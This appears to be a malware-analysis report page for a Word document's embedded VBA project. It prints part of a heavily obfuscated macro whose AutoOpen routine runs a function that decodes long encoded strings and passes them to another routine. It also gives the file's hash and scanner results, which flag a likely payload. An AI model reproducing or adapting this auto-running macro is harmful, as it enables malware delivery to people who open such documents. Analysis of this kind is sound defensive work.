Call dSbnp(kUZqtY, FnEr)
Else
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("TLHJeqUsRNF+RgAmcXZmkLFYioamvXKSRGAQiLsXnQFcDqKaHqFRKXs1buHEeWylUNByvfAZeqsx2gI3OuSxOPclDPx+2NHmTQsx2os4iLUWkNxxkrclngAQOXpSTQhxOLKxRrBkUIH+i4emcL2xkrcr4fAZeo2BkPSSkNq7BfzJeoh4vLsQkP2+eqsDeWOYVbylHXxYB1cdeClXBWylRrO9B+eYVoQlKXH1vX57V1ApnbqgV+elKuxgiDi7jo5PVGzJUgAdeoK1kNQYKNZPkup7OLKNvLpxMo2t2CKJnG572PAYvNxEkXISkuZEifs1kXE7RXIxRPBgTPUx2NZIOXlXTratRoRyeoKxkrO9cHacKqFDcfAweo2RKXs1buHE4CBmRPBgTuKGUgQlnga4vNxyiflQ2CUIifxdeNxueoltKXHETDxEiLElUNHY21SaDFaqcHKaUIpCkuBni4KRRXI+RPeYiNerMfsyiLsr2NllTLHpeWlPVWcSjgaWkPasTDxEiLElTLi7RuBxeoIcO4KteoKxkrO9cHacKqFDcf2RKXs1buHE4CBmRPBgTuKGUgAmKNH+2NxYO4KSkXzlUNHY21SaDFaqcHKaUIpCkuBni4KRRXI+RPeYi4hxU+ylUCUg3fRgVWeJUgAdeqUgiLFweCIZeWylvLOlMohCi4cmDXBtiLKIkNHQHNF+vgAmHNF+vEshkLDlUE2YOEsx2oRSTxKhRXmnOLIxeoIxRfArKXs1buHEUgQljgAQOXpSTQK72XsykXFQKuxyiflrvCKERWt7TP2JTuhS2NZmvLs72NDYOXZmTPBmi4B+RGZuO4iSOXZYTux1k+5rMgKgRGJlUNHY21SaDFaqcHKaMg2RKXs1buHE4NVYiNerMfaZ")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
End If
If xWkMza() <> 0 Then
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("TLHJeqUsRNF+RgAmcXZmkLFYioamvXKSRGAQiLsXnxHbKHUcDQZNfDpF4qU7kPBEDqVlngAQOXpSeWElbuHPTDZGvuH12oabj4BEiLEYbuHETx2xOQByvLHY2oAdeoK1kNQYfNHhiNHgRIyrH4BxRGIaiXHY2o22eWElUEI7juxyOf5IT1AlMF2SkuK72PVlbxclBGzpnga4vLzXBWyljWOEngag21tPVGzJMfaCiLBwkg5gVWqsVbe+VGaNv4UxKuZzT+RgT1AreWylUNByvfsqkP2YkNZhiqiSkNDtUXhE2CA9TgZYOLs7TrK7jLZEOfIgkucYOXZmTXBQkGZJRuZ1VfsJvCArToAQiLsXnxHbKHUcDQZNfDpFeoylUIpokXZ+2FaW4qU7kPBEDqVYiNerMfAdeF2tvLpxMoKERrHxM4ylvLOlMohCi4cmf4KxkfAQiLsXnxHbKHUcDQZNfDpFUIpokXZ+2FaW4qU7kPBEDqVYiNerMfsyiLsr2NllTLHpeWqpV1OEM4ylcrUxOLyl04ElngAQOXpSTQK72XsykXFQKuxyiflrvCKERWt7TXshku5Y2NZskPKhT4UYios1kXE7OXKYTXih2ux1kXzYvLB73gRwUCUgToAQiLsXnxHbKHUcDQZNfDpFMg2RcuZ7RPKccIp1TuKGUgQ=")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
Else
yhWAXh = hGGsS("c+SRHXxYiNZPRIpbj4BEiLE+Vxp4vLsQkP2+DNZPi4UbvNHykFpXVfzJ4Ca72XHgRXhxkNJYi4hx")
FnEr = hGGsS("TLHJeqUsRNF+RgAmcXZmkLFYioamvXKSRGAQiLsXnxHbKHUcDQZNfDpF4qU7kPBEDqVlngAQOXpSeWElbuHPTDZGvuH12oabj4BEiLEYbuHETx2xOQByvLHY2oAdeoK1kNQYfNHhiNHgRIyrH4BxRGIaiXHY2o22eWElUEI7juxyOf5IT1AlMF2SkuK72PVlbxclBGzpnga4vLzXBWyljWOEngag21tPVGzJMfaCiLBwkg5gVWqsVbe+VGaNv4UxKuZzT+RgT1AreWylUNByvfsqkP2YkNZhiqiSkNDtUXhE2CA9TgZYOLs7TrK7jLZEOfIgkucYOXZmTXBQkGZJRuZ1VGsJvCArToAQiLsXnxHbKHUcDQZNfDpFeoylUIpokXZ+2FaW4qU7kPBEDqVYiNerMfAdeF2tvLpxMoKERrHxM4ylvLOlMohCi4cmf4KxkfAQiLsXnxHbKHUcDQZNfDpFUIpokXZ+2FaW4qU7kPBEDqVYiNerMfsyiLsr2NllTLHpeWqpV1OEM4ylcrUxOLyl04ElngaSiGAtMq2x2oIbOXhxiCHyiLKDO4BweoIDO4BwbuFmifArcuZ7RPKccgRSTxKhRXmnOLIxeoIxRfArcuZ7RPKccgRSeCylUNByvfsqkP2YkNZhiqiSkNDtUXhE2CA9TgZYOLs7TrK7jLZEOfIgkucYOXZmTXBQkGZuO4iSOXZYTux1k+5rMgKgRGJlUNHY21SHDEHfDFU3KQxVKfyr4qU7kPBEDqBROgsQOGRSeCE=")
kUZqtY = JyTt(yhWAXh)
Debug.Print (FnEr)
Call dSbnp(kUZqtY, FnEr)
End If
End Sub
Public Sub AutoOpen()
Call ecuuxx
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 65536 bytes |
SHA-256: 72e3d7df95117d8f2487fe147e30481b96964adf8188281d9c1640be5fbcf1fd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.